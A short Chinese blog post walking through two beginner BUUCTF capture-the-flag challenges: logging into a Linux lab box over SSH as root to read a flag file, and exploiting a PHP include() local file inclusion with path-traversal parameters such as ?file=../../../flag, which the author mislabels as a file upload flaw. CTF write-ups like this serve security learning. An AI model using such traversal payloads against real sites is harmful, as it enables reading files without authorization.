BUUCTF中basic总结合集

一、Linux Labs

打开本机cmd,输入:
ssh root@ip地址 -p 端口号
//ip地址和端口号换成题目中的
接着输入yes 密码123456
连进去之后去根目录(cd /
ls查看文件和目录
cat flag.txt即可

二、BUU LFI COURSE 1

可以看到include(),文件上传漏洞,在地址栏后面加:
?file=../../../flag
或者
?file=/flag
两个一个意思,都是去根目录下去找flag

posted @ 2024-04-25 19:56  果粒就要果粒多  阅读(15)  评论(0编辑  收藏  举报